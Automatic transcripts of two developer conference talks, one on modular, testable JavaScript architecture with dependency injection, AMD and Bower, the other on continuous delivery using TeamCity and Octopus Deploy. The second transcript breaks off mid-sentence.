10 lines and everything, but you should really focus on what feature are we working on here. And try to separate them from the rest of the site. So this should be focused and they should really do one thing really well. I also think that modules should be decoupled from other modules. So you don't need absolute separation, but they really should be separated from each other. So you can place it in a new context. You can move it around on the site and it doesn't break anything. That's not easy in a lot of jQuery apps. If you move it around, you change the DOM structure so your application breaks. At least it's more difficult to do this in a jQuery application. And also it should, just doing this should make your app easier to reason about. It's easier to understand what's happening where. And I think that they should preferably be reusable. This is of course not a requirement, but it's a good thing to have in mind because it puts you in another mindset. So you start thinking about the things you're creating. So I tend to think a lot about this when I work with what I call modules. And I also think that they should be easily testable and they will be more easily testable just by creating these smaller, more focused modules instead of having your big application. So just by following the steps themselves, it should be easier to test your modules and your application in general. So there's still a lot of things we need to think about to get testable JavaScript because testable JavaScript is really hard. There's a lot of books written about it recently. There's a lot of presentations about it. There's a lot of people talking about it, but still it's quite hard to get there. 
We've been working quite hard with it for a couple of years and we're still struggling with really testing our JavaScript in a good way. And one of the core problems here is that we need to work with a DOM that is actually stateful and that is the big blob. So testing JavaScript is hard. Again, from growing object oriented software, they say that your system is easier to change if its objects are context independent. So that's precisely what we want to do with our modules. So the object shouldn't have any built-in knowledge about the system in which it executes. So now moving them around is far easier. If they don't depend on the DOM in the same way, it's easier to reuse them in another context. So you can move that search bar to a new page. It's now easier. So we can set down some ground rules for our modules. So just a couple of minor rules. And the first one is that they should never access the DOM outside the module. As soon as you do this, it's far easier to reason about your code because this module works on this part of the site. It doesn't suddenly work on a totally other place on the site. So this might seem like a natural thing to do, but it's so easy to start working on other places on the site. They also shouldn't create global variables. As soon as it creates global variables, someone else could work on those global variables and could put your system in the wrong state. So generally, try to keep away from global variables as much as possible. This is perhaps one of the most important things to think about when working with larger applications. Because the global variables are really hard to track what state they're in. And also don't access global variables, except, of course, the native built-in ones in JavaScript. So keeping these things in mind should really get you a long way. There's just a couple of simple steps, a couple of simple things to think about. So you have mvstar, just split, separate the DOM from your state or your data. And then you have modules. It's just a way to think about how you separate those things. So you create these small, bite-sized pieces of your application instead of having these large JavaScript files. So next up then is how we handle dependencies. This is also quite hard in JavaScript. We have a lot of different types of dependencies. We might depend on other code. So that's when the application runs. We actually need to have access to some objects. We need to have access to a place in the DOM where we should place our module. And there's a lot of dependencies you have in your code. You also tend to depend on other files. As soon as we start thinking about modules, you usually need to depend on something else. So you need to get that into your application in some way. And we also depend on third-party libraries. So things like jQuery, Backbone, Angular, and those things. So if we're just going to look at one of them at a time, so the first one is that we depend on other code. And the problem here is that we tend to depend far too much on global stuff because JavaScript makes this really easy. So here's an example of that. We have this small bit of jQuery. We find an element in the DOM. We click that element. We wait for a click on that element. And then we do an IAX request. And on success, we update the DOM. So just a minor piece of code. The problem here is that we have a bit of code that can't be reused. We have this anonymous function that is called directly. So this is really hard to reuse in another context. 
What if you need to fetch the same data? It's also difficult to test because you need to actually have the DOM available and you need to bind this click event and then click on the button. And that's really difficult. You shouldn't need that at all. And you also have a couple of globals. So here we're using jQuery. So jQuery.get. We do an Ajax request. And we also update the DOM directly here. So by doing some changes here, we can really make this far better. So the first step could just be to name that function and take it out of the click handler. So now we have a method here that we can call directly. So now you don't have to create the DOM with the click event. So now you can call the function directly, but you still have a couple of problems. You have this Ajax request that is difficult to test. So now when you call this bit of code, it will do an Ajax request. So you need to either mock out jQuery or you need to mock out all Ajax requests. You shouldn't need to do that. You also still have the globals. You rely on having jQuery available in the global namespace. And you also depend on having the DOM. So we kind of got away from the DOM problem, but we also still have a DOM problem. So here we're just changing it up a little bit. Instead of relying on jQuery being available in the global namespace, we send it into the function. So we could have called it something else here, like just jQuery, when we sent it in. But here I called it ajax, so we can see ajax.get. So now if we want to test this, this is far easier. Now we can mock this out. We can send in something that has a get method that does just what we want to do. We have also sent in the HTML element where results should live. So now we can create an empty element with jQuery and send that in, for example. So you don't need to set up the entire DOM anymore. So now this is far easier to test, and this is actually far easier to reuse in other contexts. If you need to do the same Ajax request and update another place in the DOM, that is really easy now. So the thing is that now we can control the dependencies. So we're still at a reasonably low level of abstraction here. So we could have had higher level abstractions for Ajax and everything. We're still just working with jQuery itself. It's just that we're using jQuery a little bit differently than we usually do. So I wrote a blog post about this, I think it's about a year ago, where I talked a little bit about a view abstraction based on Backbone. So just using pure JavaScript instead of relying on Backbone, which, even though it's small, is a thousand lines of code. So you could create, say that you have a view with just some subsection of your site, for example, the search bar that we saw on Facebook. So you could have a user view where you say that you want to receive, do I have the mouse here? Maybe? So you say here that you want to have an HTML element that you receive, and you also want to receive a user. So with user view now, we can, this is on the bottom here, we can say that we want to create an instance of this. So with JavaScript you can create an instance of your function, and then this will refer to that instance. So we put the HTML element that we send in, which is here something we found in the DOM, and we also send in user and put that on the instance. So now we can create methods on this view. So we can create a showImageInstant method that just appends an image to the DOM. And now we can call that method.
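Spelled out, the refactoring described here goes from reaching for globals to passing the dependencies in. This is an illustrative sketch, not the talk's exact code; renderResults and fakeAjax are made-up names:

```javascript
// The dependencies are injected: an object with a get() method, and the element to update.
function loadResults(ajax, resultsElement) {
    return ajax.get('/api/results').then(function (data) {
        resultsElement.html(renderResults(data));
    });
}

// Production wiring: real jQuery, real element.
loadResults(jQuery, $('#results'));

// Test wiring: a fake ajax object and a detached element -- no network, no page DOM.
loadResults(fakeAjax, $('<div/>'));
```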
So the thing is now that we have another way to think about how we use jQuery. Now we send it in, now we have wrapped it in a reasonably simple abstraction. So this is no library at all, this is just a way to use pure JavaScript. And this is basically what, for example, Backbone is. It's just a couple of helpers in addition to this. So what I would say is always inject your dependencies. This really helps with structure, it helps with testing, and it helps with creating larger applications. And an example of someone who has really embraced this is AngularJS. Here's an example of some AngularJS code. You have a controller, which is the thing that puts stuff, for example, on or makes stuff available for your DOM, for your HTML. So the thing that you put on scope here, which is something you get into your controller, will be available for your template. So here you can see that. So let's see if we have the mouse here. What you put on scope here will be available. So now we can do an Ajax request. And then on success, we update the scope, which then makes it available for the template. The thing is that it doesn't matter which way you order your arguments here. If you just change that around, Angular will still handle this with no problem. So they have a built-in service locator. So they see the function, they can see the names of the parameters, and then they go looking for those. So here it's built-in functionality in AngularJS, the HTTP and the scope. But you can also register your own bits of code here. So to take an example from AngularJS, you could do something like this. You say that you want to create a module. Here it's named NDC, and it has no dependencies. That's the empty array. Then you can say that you want to create a function, which is named awesome. And that function should return awesome conference. And then you can create an injector. And in your injector, you say that you depend on NDC, which is your module, and you also depend on NG, which is a built-in Angular module. So this happens behind the scenes in AngularJS itself, but it's quite easy to do with the built-in stuff. So here we see that the NDC is just the NDC module. And now we can invoke a function on that injector. So here we see that we have a function, which takes in awesome, and then it console logs. So this will actually console log awesome conference. So Angular finds the name here, and it finds it in the things you have registered on the NDC module. Another cool thing that is going on in a lot of new libraries and frameworks is two-way binding. So this is a really cool way to work with the DOM. It's done in, amongst others, Knockout, Angular, and Ember. So if you look at an example from EmberJS, we have a template at the top here, where it says if it's expanded, then it should show some data. And it should also show a button that you can press to contract it again. And then if it is not expanded, it should show a button where it says show more. So if you look at the post controller, which is the thing that gives the template its data, you can see that isExpanded defaults to being false. So the first time you render this template, it will go to showing the button that says show more. And on the show more button, you have this action where it says expand. So when you click on expand, click on this button, it calls the expand action, which is on the post controller. So here we see that we update isExpanded to true. So now it will automatically update the template.
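Written out, the AngularJS example walked through above looks roughly like this (AngularJS 1.x):

```javascript
// Register a module named 'ndc' with no dependencies, and an 'awesome' factory on it.
angular.module('ndc', [])
    .factory('awesome', function () {
        return 'awesome conference';
    });

// Create an injector that knows about our module and Angular's built-in 'ng' module.
var injector = angular.injector(['ng', 'ndc']);

// Angular inspects the parameter name and hands us whatever is registered under it.
injector.invoke(function (awesome) {
    console.log(awesome); // "awesome conference"
});
```

One thing to be aware of with this name-based injection is that minification renames parameters, so in real Angular code you typically use the array annotation form to keep the names available.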
So the thing is here, we have no jQuery at all, but we're still working with the DOM. So this is just another way to work with the DOM that is really, it's used quite a bit in the three libraries I mentioned. So you get rid of event handlers, you get rid of manual DOM updates, and you can ensure that your template is in sync with your data without having all of this jQuery hacking. So that was the first thing. Now we have another way to work on, work with other code. So now if we go on to look on other files, the problem now is that we depend on the order of script elements in our index HTML. And when you get hundreds of files, this is really a problem. It becomes unmaintainable, and it also becomes really brittle. And it's hard to know what needs to be there for something to function, especially when you get, say that you have 100 files, this is really hard. So we want to get away from this. We need something better. Because the thing is that we introduced lots of globals here. So we pull in jQuery, then we have jQuery as a global. We pull in Backbone, then we have Backbone on the global namespace. We have our own code that is on the global namespace. So you have a lot of weakly stated dependencies. It's hard to see what needs to be there for something else to function. So we need a better way to refer to other files. Two ways of doing this is commonJS and AMD. CommonJS is the way that Node.js solves this. It looks something like this. We say that we require jQuery, and we take the results from that require, and we put it on the dollar. And then we can also say that we export something from our current file. So here we export my function, so that when other require our file, that file, it has my function available. AMD is another way of doing this. Here you see that when you define this bit of functionality, you depend on jQuery. And it's also put in here into the dollar. And what you return from this function will be available when someone else say that they depend on this file. So now we can avoid globals. Now we can get away from having jQuery on the global namespace. And we don't need to use backbone from the global namespace. So now it's really easy to see dependencies. When you open a file, you can see it at the top of the file, what this bit of code depend on. And that makes your code, I would say, easier to understand. You can see right then and there what you depend on. And you can also see that you depend on too much stuff. When you have 50 things you depend on, that's usually a sign that you need to do something. So this is also a way to help you. And I'll split your code into new modules to split that file into something less than the 5,000 lines of code. Right now AMD works better in current browsers. You have some ways of running common JS, such as a library called Browserify. But right now AMD works a little bit better because it's asynchronous. So what happens here is that usually when you say that you depend on jQuery, the library can see have you loaded jQuery already? No, you haven't. Okay, then I go dynamically look for jQuery on the server. And you can also minify that into one file for production. For example, with something like RequireJS, there's a lot of implementations of AMD right now. I've used RequireJS quite a bit. And it works quite good. Of course there's a bit of complexity when you pull in something like this because this is a central part of your site, how you handle modules. So RequireJS has worked quite good for me. It also has a minifier. 
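Side by side, the two module styles look roughly like this:

```javascript
// CommonJS (Node.js, or in the browser via something like Browserify):
var $ = require('jquery');

module.exports = function highlight(element) {
    $(element).addClass('highlight');
};

// AMD (for example RequireJS): the dependencies are loaded asynchronously
// and passed into the factory function; the return value is the module.
define(['jquery'], function ($) {
    return function highlight(element) {
        $(element).addClass('highlight');
    };
});
```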
So you can have 200 files in development and you only want one file in production. There's a minifier there that you can run to get this one file. So now we have handled how we depend on other files. So now we can see that there isn't really a problem depending on 200 other files when you have something that can solve it for you. There's also stuff going on here for a new versions of JavaScript. So there will be some built-in modules stuff coming in a new version of JavaScript. So the last thing for dependencies is that we depend on third-party libraries. And we need to keep this up to date. Now you usually need to go to jQuery.com, see that, okay, jQuery is updated, and then you need to download it and everything. And it's also really hard to see, is it updated, without going to all of these pages to see. So you can use a package manager like Component or Bower. This is still, I don't know, quite... This is new stuff. This is happening right now. Twitter created Bower or released Bower. It's not a long time ago. So this is quite new and it might not be the perfect solution yet. And there's a lot of difficult problems to solve here. But with Bower, for example, you can do something like this. You say that in your Bower.json file, you can say that you depend on AngularJS, you depend on AngularResource, and you can see that we depend here on version 107. We can also say that we depend on jQuery. And now, when you type Bower install, it will go looking for those on GitHub. And the nice thing now is that if you type BowerList, you can see that you have downloaded Angular, AngularResource, which depend on Angular, and you can also see that jQuery is not up to date. So there are new versions available. And then you have 20, 30, 40 dependencies. This makes your code really easy. It makes it far easier to update dependencies regularly. So, for example, here, if we have written BowerUpdate, we could update these dependencies. And to save a new dependency into our Bower.json file, we can say Bower install, dash dash save bootstrap, for example, to download Twitter Bootstrap. So this is somewhat similar to NPM for those that I've played with Node.js. So, we've been through quite a lot of stuff. There's a lot of new stuff going on in JavaScript right now, and there has been for a couple of years, and there will happen a lot of stuff the next couple of years. But your question might be, seriously, do you need to do all this stuff? And I think it depends on the type of application you're making. So usually, we have applications that need to live for a long time. You have a lot of unforeseen requirements. You need to adapt to what's going on. So there's this big push for having even more interactive stuff on the front end. So we have more and more complex applications. And when we have more and more complex applications, we really need to think about how we develop our applications. So I absolutely think it's necessary to start thinking about these things and learn more about them. And not all of them are ready for production use if you're not ready to debug it and stuff. I've been debugging Bower somewhat lately. It doesn't run that good on Windows. So I think we need it, but we're still not quite there yet. For some of the things we are, so you should absolutely go check out Angular and Ember and Knockout and Backbone at least. There's a lot of cool stuff going on. 
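For reference, a minimal bower.json along the lines of the one described might look like this — the names and versions are just illustrative:

```json
{
  "name": "ndc-demo",
  "version": "0.1.0",
  "dependencies": {
    "angular": "1.0.7",
    "angular-resource": "1.0.7",
    "jquery": "~2.0.0"
  }
}
```

With this in place, `bower install` pulls the packages down, `bower list` shows what is installed and what is out of date, and `bower install --save bootstrap` adds a new dependency to the file.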
So if you want to learn more about this, me and a couple of friends created this resource for finding good articles and videos on this stuff because we thought it was really difficult to find good stuff on JavaScript. So if you have any good ideas for articles, videos, presentations, whatever, just send us an email because we really want to have a really good resource for people to find good stuff for creating large JavaScript applications. So that's all. I've put the presentation online so you can find it at Speaker Deck. So any questions? And if you don't have any questions right now, you can also find me afterwards. I will also be here on both tomorrow and on Friday, so you can just come by and talk about JavaScript. So if there are no questions, I think we're done. Thank you.
|
JavaScript has come a long way in a few years. As we no longer need to battle DOM differences, we can focus on building our applications instead. Now, however, as more and more application logic moves from the server to the client, our main problem is that we need to unlearn our earlier DOM-centric approach to JavaScript. Tools such as Backbone and Angular help, but before we are able to use them effectively we have to change some of our neural pathways. In this talk I will look at a couple of patterns that will help you move away from jQuery spaghetti and get you started on a foundation for building large-scale JavaScript applications.
|
10.5446/51465 (DOI)
|
Hello! Welcome everybody. This is my talk, Automated Release Management with TeamCity and Octopus Deploy. Thank you for coming. I have a lot of slides and a lot to say and something to show, so I'll just start right away. We start about, we have to start with a little bit of history to understand continuous delivery and why we should use it. It started with continuous integration some 10, 15 years ago where we realized that using the version control wasn't enough, so we started adding build servers and running and compiling the code on each check-in and running unit tests and that gave us many advantages and better software for a lot of us. Then they came a blog, talked about continuous deployment, which proposed to use the practices we used for continuous integration but also try to automate the deployment process. After a while, there came a book called Continuous Delivery which tried to take this even further and say that, okay, you are not finished writing your software until you are in release and you should automate everything. And really, it's all about failing fast. If you work for a long time, write a lot of code and then check it in and find a bug. You will have to backtrace a lot, especially if you have, say, implemented five features, you have a bug in the first feature and the next four features rely on the first. Then you have to do everything again. So if you do small incremental changes or small releases, you will have smaller steps to backtrace if something goes wrong. So it's essentially the same logic used for writing unit tests and continuous integration only applied to deploying and releasing. In the book, Continuous Delivery, the first chapter available online, you can find this graph, this chart. It's an image of the deployment pipeline. As you can see on the top, you have your source control which contains your source code and also your environment and app configs. At the bottom, you have the artifact repository which contains all the products of the builds and tests. So with the test reports, test coverage and actual deployment package. You have the commit stage where you compile the code, you run the commit tests. That's the ones that take short enough time to be in this stage. Then you assemble the package and you do some code analysis. If everything is okay, you will automatically deploy and go to the next stage, the acceptance stage. Where you configure and deploy this to your test environment, run a smoke test to see that the website is up and running and then you run your automated acceptance tests. If this goes well, then you will have one, usually one click deployment to the next environment. You have the user acceptance environment where you have some manual testing. You have the capacity stage where you do stress testing and load balancing. It's very important that the capacity stage equals the production stage or the hardware and setup. So it gives you good representation. And then finally, you have the production. This is not what I'm proposing that you should go implement tomorrow. But I use this as a goal when I'm trying to build my deployment pipeline. In the same way that you have on the left, you have Uncle Bob's vision of how your test coverage should be. You can see that you should have 100% unit test coverage, 50% component tests. This, I would also say this, don't go try to implement this at once unless you have a green field project and can start from scratch. If you can reach the one to your right, you should be happy. 
You should not stop there, but you should at least have that as a first goal. Another thing in continuous deployment is where it is, blue-green deployment. It starts with one version of your system in release. Then you deploy a second version while the first one is still there. And after running smoke tests on all of the servers that you have deployed to, then you just flip a switch and reroute all the users to the new version. This is very good because if something should go wrong, you can just flip the switch back and you don't have any downtime or any significant downtime in your production environment. So Facebook goes a little bit further. They have this big clusters of servers and millions of users. You can imagine what would happen if they made a critical bug into production. Then their reputation would just fall apart. They first release the new versions to an internal part of the servers where only their employees get to test the feature. When they are satisfied with the quality level there, then they deploy it to a small subset of the features. When they are satisfied with that, they deploy it to everybody. Using this way, they can also test the different versions of implementing a new feature and see which one gets the best response and go for that. So the argument for using continuous delivery because you will need some arguments to be able to spend your developing time doing something else than developing. You have the quality argument. In the same way that unit tests increase the potential quality of your software, automating your builds will give you a repeatable reliable way of deploying. So you can remove the manual step, get fewer errors and that gives you higher quality software. You will save money by catching bugs early if you have automated acceptance tests. You will save money because it would take a shorter time to fix them. If you can pick the bug up and the automated acceptance test stage, then if you have to wait a week for the testers to be able to test it. And you have the time aspect. Once you have automated your deployment, it will be automatic. You can just push a button and the time you spent before, you can use doing other stuff. A small example of this, in the background you can see the whiteboard of our key office. They decided to implement this team city octopus deploy solution. Before they started, they had approximately 30 minutes to deploy time. After, they had four minutes. Now they deploy four times a day and they spent initially eight hours of implementing the process. And if you do the math, you have a small equation there which says that if you do this on Friday or during the weekend, then a little bit after lunch on Friday, you will have saved all the time you spent on it originally. And then you will save approximately half an hour each time you click the button. And if you add this, put some numbers on this, multiply it with hours, number of releases you have, maybe the hourly price of a consultant, then you would probably have a strong argument for your superiors for implementing this. So that was the short introduction part. The next part I'm going to use trying on another equation, trying to prove another equation. And we are loading the next slide. Oh. Don't get any internet here. That's sad. Is there any reason for there not being any internet connection on the NDC network? Is there any other network I can use? Okay, we'll try the cable. Now I have a question. Let's see. If I can use the cable. 
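As an aside, the back-of-the-envelope savings calculation from that whiteboard example can be written out explicitly. The 30 minutes, 4 minutes, 8 hours of setup and 4 deploys a day are the numbers quoted above; the hourly rate is a purely invented placeholder, so this is only an illustration of the arithmetic, not the actual figures from that office.

```powershell
# Back-of-the-envelope break-even calculation (hourly rate is a made-up example).
$oldDeployMinutes = 30
$newDeployMinutes = 4
$setupMinutes     = 8 * 60
$deploysPerDay    = 4
$hourlyRate       = 1000            # currency units per consultant hour, illustrative only

$savedPerDeploy   = $oldDeployMinutes - $newDeployMinutes                 # 26 minutes per deploy
$breakEvenDeploys = [math]::Ceiling($setupMinutes / $savedPerDeploy)      # about 19 deployments
$breakEvenDays    = [math]::Round($breakEvenDeploys / $deploysPerDay, 1)  # roughly a working week

$savedPerWeek = [math]::Round($savedPerDeploy * $deploysPerDay * 5 / 60 * $hourlyRate)

"Break-even after roughly $breakEvenDeploys deployments, about $breakEvenDays working days."
"After that, roughly $savedPerWeek per week in recovered time."
```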
Let's see if we can get this slide up and running. Do I have to reload the entire page? No. Oh, there we are back. I think. I'm sorry for this. I did have the entire slide deck preloaded before my blue screen, right before the start here. Oh, and there we are back on. Nice. Just took some time. We were at number 15 there. Yeah, the question that I'm going to spend the rest of the time on is this one. I'm trying to prove that using TeamCity and Octopus Deploy is a ton of fun. At least I think so. So we're going to start with showing how to deploy a website. We start from scratch and we start in Visual Studio. We create a basic ASP.NET website. The only thing I'm going to change is a part of the index page where you can see I have a reference to environment and version. Environment just reads an app setting variable from the config file. Version reads the website DLL assembly version. I have also added a couple of additional transform files. You can see these will be the names of the deployment environments. That will make them automatically be transformed when deploying to that environment later. So when we have done that, we will need to create an Octopus package, an Octopus NuGet package. You can also see this is the config transform I have. All it does is find the environment setting in the app settings and change it according to the environment, just to show that the transforms are working. So we start off by creating the Octopus NuGet package. If you wonder why they chose the NuGet format, since that is basically a format for library dependencies, on their website they say it's because NuGet packages have rich metadata, there are lots of available tools for creating and managing them, and they are feed-based so you can easily write your own feed and easily consume the feed. Developers know how to use them because we use them all the time when developing our own software. It's already used for other purposes, like Chocolatey, which is the closest thing you can come to an apt-get or aptitude for Windows. It's a single command line based way of installing packages and software. Another thing you need to be aware of when creating these packages is that Octopus does not follow the default NuGet conventions. NuGet has a default folder structure and stuff like that; Octopus deploys the package as is. So if you have a website, you just pack that directory and you're good to go. Then you need to add a .nuspec file. This is used by NuGet to add additional information to your package. The important thing here is mostly the ID. The version will be overwritten. The title and description are just for describing the package, and the other stuff is mostly ignored. So you have three ways of creating this package. By far the easiest way is to open the Package Manager Console and type Install-Package OctoPack, which is a tool that downloads a targets file, modifies your csproj file to reference it, and also has an executable for creating the package. Then you can just add a parameter to your MSBuild call, RunOctoPack, and it will create the package for you. The second way is using TeamCity. They have a NuGet Pack runner, where you specify your build number, your directory and your output directory, and you can also select publish created packages to artifacts in TeamCity. We'll come back to that later. And we will have... this is a snippet from a PowerShell script you'll see later.
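To make that snippet concrete, here is a rough sketch of what the .nuspec and a manual nuget.exe pack call can look like, together with the OctoPack MSBuild property mentioned above. The package id, paths and version number are invented for illustration, and msbuild.exe is assumed to be on the path; check the NuGet and OctoPack documentation for the exact options you need.

```powershell
# Sketch only: package id, paths and version are made-up examples.
$nuspec = @"
<?xml version="1.0"?>
<package>
  <metadata>
    <id>NdcDemo.Web</id>
    <version>0.0.0</version>
    <authors>Build server</authors>
    <description>ASP.NET demo website, packaged as-is for Octopus Deploy</description>
  </metadata>
</package>
"@
Set-Content -Path .\NdcDemo.Web.nuspec -Value $nuspec

# Pack the published website folder exactly as it is (no NuGet folder conventions):
$packArgs = @(
    'pack', '.\NdcDemo.Web.nuspec',
    '-BasePath', '.\NdcDemo.Web',          # directory that gets packed as-is
    '-OutputDirectory', '.\packages',
    '-Version', '1.0.123'                  # normally the TeamCity build number
)
& .\tools\nuget.exe @packArgs

# Or let OctoPack do it as part of the build, which is what the TeamCity checkbox automates
# (assumes msbuild.exe is on the path):
& msbuild .\NdcDemo.sln /t:Rebuild /p:Configuration=Release `
    /p:RunOctoPack=true /p:OctoPackPackageVersion=1.0.123
```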
You can just use the NuGet executable directly, and then you specify the file name, the content directory and the version. So there, that's the three ways. Now we're actually finished in Visual Studio. If you have done that, you're finished and can go over to configuring TeamCity. For this web project, we will have two build configurations. The first one will be the commit build. We will set this up. We will only change the build number format. I've changed it to a format that I like. This squiggly thing at the end means that the zero will be replaced by the counter on each build. Then I add a VCS root. I'm connecting to GitHub and this link is live. So we go to GitHub, and you can see the source code I've been using for this project. And then in the build steps page, I add a build feature and choose the AssemblyInfo patcher. What this does by default is run through all your AssemblyInfo files before the build, replacing the version number with the build number you have. You can also exchange it with other stuff if you'd like, but the default action is to replace it with the build number. Then you add two build steps. We have the first compile step. It's a Visual Studio runner type. Select the solution and you have the target rebuild, configuration release. That's okay. Then at the bottom I have an extra section because I installed the TeamCity Octopus Deploy plugin. So instead of adding the RunOctoPack parameter for MSBuild, I can just check this box and say that, okay, I want the system build number to be used for the package version as well. Going further, you have the commit tests. It's an NUnit test runner running all the test DLLs in the release folder, excluding the ones in the obj folder since they don't have any references and I don't want to run tests twice. Of course, I want the build to trigger on each check-in, so I add a VCS trigger for that. Then we can run the build and it will produce a build artifact. It will produce a NuGet package which you can open because it's basically a zip file. You see the project structure. There are a couple of files you don't need to worry about because you will not see them after deployment, like the _rels folder and the [Content_Types].xml there. Now we are actually complete, but we want to publish this package to a NuGet server. Thankfully, TeamCity has that as well. So you just go into settings, you click the NuGet settings and you click enable NuGet server, and then you will get an authenticated feed URL which you will use. If you want to use one of the NuGet tools or TeamCity build tasks, you will need to go to the NuGet command line tab and add NuGet as well: download a version or upload it. When we have done that, we go over to Octopus Deploy because now we need to set up our project. First, we create some environments. As you can see here, you have three environments. We have the development environment located on the build server and we have separate test and production environments. The way you configure this is to install a small service called a Tentacle on each of these servers. During the installation process, they will give you this thumbprint which you will have to enter in this box when you add a machine to an environment. You give it a name and a URL and you give it a role. We only have one role. We only have one machine. It's a website. I don't have any database servers and I don't have any other external servers.
You will also need the thumbprint located in the Octopus Deploy configuration to put in the Tentacle config as well, to authenticate both ways. Then I do this for the other two servers as well. We can start creating our project. We can just create a new project group, and we go to configuration and add a NuGet repository. You can see this field, this is the URL you saw in TeamCity before. I used the username and password that I created for TeamCity, which was in this case build and build. Now I create my project group and project. When I have done that, I go in and start adding these steps. I'm not going through the first step now because this is just a PowerShell script roughly copied from the Octopus Deploy documentation page. If you click on PowerShell scripts there, I believe that's where you can find the script. I just changed a few names. This script will be available for you afterwards and at the end I will give you a peek at it. I will go through the publish website step. You will see here that you choose a NuGet repository and a package. You will get auto completion when you type that. You select which role you want to deploy it to. Then you have some XML configuration. You have two main options. One option is to automatically run configuration transformation files. If you deploy to the development environment and you have a web.development.config, that transformation will be run. And so on for test and release. You can add some additional transforms if you want. If you have some Octopus variables with the same name as any app settings, you can also check this box to make them overwrite those, so you don't need the config transforms. And since this is an IIS website, I will say, I will try to automatically update the IIS website with this name, which is a variable that I have set. The smoke test is just another short PowerShell script. It gets the PowerShell variables host name and port and it does a web request to that URL to check that the website is up and running. Very basic. And then I have a manual step. We can see that this step is only for the test environment. So in the other environments, this will not be run. You have some instructions: go to this location and verify the new behavior. That's just a very simple description. And it's only users in the testers group that are allowed to perform this step. Developers are not allowed to say, verify this deployment in the UAT environment. The variables I have are the host name, as you see. These are connected to a specific machine, which makes sense. You have the IIS bindings, which use the port and the host name. This is the way you refer to Octopus Deploy variables within Octopus Deploy: it's the hash sign and the variable name within brackets. I have an empty variable name here and I have the Octopus website name, which says that you are going to install this website in development as NDC 2013 demo development, and in test as test and so on. You have the port 8080 for development, since I have a lot of other services running there. For test and production, that port is 80. But you can see that I cannot see and I cannot edit this variable, because this is a production variable. This screenshot is taken when I'm logged in as a developer, and I've explicitly set the rights so that you're not allowed to see or edit production variables. So that's one way you can get your IT ops department to allow the rest of the production configuration to stay in source control.
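The smoke test step he describes is small enough to sketch in full. Octopus hands the project variables to PowerShell steps, so with the HostName and Port variables from this demo it would look something like the following; the exact way variables are exposed differs between Octopus versions, and Invoke-WebRequest needs PowerShell 3 or later, so treat it as an illustration.

```powershell
# Minimal smoke test sketch - $HostName and $Port come from Octopus variables.
$url = "http://$($HostName):$($Port)/"
try {
    $response = Invoke-WebRequest -Uri $url -UseBasicParsing
    if ($response.StatusCode -ne 200) {
        throw "Unexpected status code $($response.StatusCode) from $url"
    }
    Write-Output "Smoke test passed: $url is up."
}
catch {
    Write-Error "Smoke test failed: $_"
    exit 1    # a non-zero exit code fails the deployment step
}
```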
And then they and only they can have power over those variables. The permissions are set as follows. First you allow the roles that you want and then you tie it down. So administrators are allowed to deploy to all environments, developers and testers only to their respective environment, and everything else is denied. And you can see that Octopus administrators are allowed to view and edit production variables, but no one else is. And then the last step: you want TeamCity to be able to act as a user when you start deployments from TeamCity, and for that you need this API key. Then you can go back to TeamCity and create the integration build. The integration build is pretty similar, but you can see that the build number format is entirely taken from another variable. The dep means it is a dependency. The bt2 is TeamCity's static name for a specific build configuration. After adding the dependency, you will get auto completion when typing in these variable names, so you don't need to guess which name TeamCity gives the build. And to add that dependency, I added a snapshot dependency here for retrieving that build number. Then you add the Octopus Deploy create release step. This is also a build step that comes with the Octopus Deploy TeamCity plugin. You specify the URL of the server, the API key I just mentioned, you name the project, you say the release number you want to have, and whether you want to deploy to one or more environments. Since I'm going to have another step running some so-called automated integration tests after this, I'm going to wait for the deployment to complete before continuing to the next build step, which is a PowerShell step. I've added the text that was in this text box in a little more readable way. It is the same stuff that we did in the smoke test, but you have to call it a little bit differently. You have to use a web session when calling it from TeamCity. And that's actually all you need for deploying the website. Let's see if we have the connection to TeamCity here. So I'll try connecting again to see if we can get it running. So let's just try to open the build server. All this is set up on three virtual machines running a free version of Windows 7. If anybody wants these machines and the build environment, you can get a copy from me. It's about 17 gigabytes. I have it on this, right? Oh, yeah. And I use the standard password, which is password one. Okay. While waiting to demonstrate that, we can go on with how to deploy a service. The service I chose is another website of sorts: ASP.NET Web API self-hosted as a Windows service. I'm not going to go too much into detail on how to do that. We're just going to start from, okay, we have a service. We have the application config. We have two other variables, the host name and port. These will be overwritten by the Octopus Deploy variables later. Since this is not a website, Octopus Deploy does not know how to install it itself. But if we have a script named Deploy.ps1, it will run that when it comes to that part of the deployment process. I have made a PowerShell script library, which is being used by Deploy.ps1 there. The HttpApiService contains all the magic for self-hosting Web API. And I have the same configuration transforms as I had in the last project. I have a nuspec file with a different ID. Then there's the program which bootstraps things, and the project installer, where the only important thing is that I need to have the service name the same as the actual service name provided here.
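A quick aside on the check he mentions running from TeamCity: it has to be called a little differently, with a web session. A sketch of such a TeamCity PowerShell step could look like this; the URL is a placeholder, and -SessionVariable is simply the standard Invoke-WebRequest way of getting a web session, so verify the details against your own setup.

```powershell
# Sketch of the post-deployment check run from the TeamCity build agent.
$url = 'http://test-server:8080/'    # placeholder address of the deployed site

# Use a web session, since a plain request behaves differently from the agent.
$response = Invoke-WebRequest -Uri $url -SessionVariable session -UseBasicParsing

if ($response.StatusCode -ne 200) {
    Write-Error "Deployment check failed for $url (status $($response.StatusCode))"
    exit 1    # fail the TeamCity build step
}
Write-Output "Deployment check passed for $url"
```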
And I gave the display name the name I want to have in the Windows services list. And the rest of the process is almost exactly the same. So I'm not going to go through all the steps once more. I'm just going to go through the differences. So everything I'm not showing in this part of the process is exactly the same as when deploying the website. I have removed one step, the prepare step, and I have the publish service step instead. The thing I've done there is I just unchecked this and removed the text from here because it's not an IIS website. I also have another set of variables, the host name and the port. And now I'm logged in as administrator so we can see the actual port in production. These variables will be replacing the ones in the app config. And the differences in the automated acceptance test here: this URL will return a JSON object containing the environment and the version, just like the other website. I then save the web response in this variable and I check if it contains the correct environment and the correct version. You can see that to get a TeamCity variable inside a PowerShell script you use this format, and you replace the dots with underscores. So let's see if we got this server up and running. Did we? No, not yet. I can see if we can. It does seem like it. Then we will go on. The next two scripts use this configuration file, a structure I've created just for my own purposes. It's about creating packages and publishing them with PowerShell. The first file here, you can see it takes a couple of parameters, the content directory and the version. You create a new XML object, load the configuration file into that, and have a variable containing the entire configuration structure. I assemble the nuspec file name from the config name and I create the entire path which I send to NuGet pack. You might recognize this from earlier in the presentation. And I catch errors and I have an exit code one to notify the build or release process that this blew up. To publish a NuGet file it's almost the same. You load the configuration, now you create the NuGet file name string instead of the nuspec. And then I add a NuGet source for the server I want to push to. Then I publish that package to that source and I remove that source again, because I don't want that source, which is my 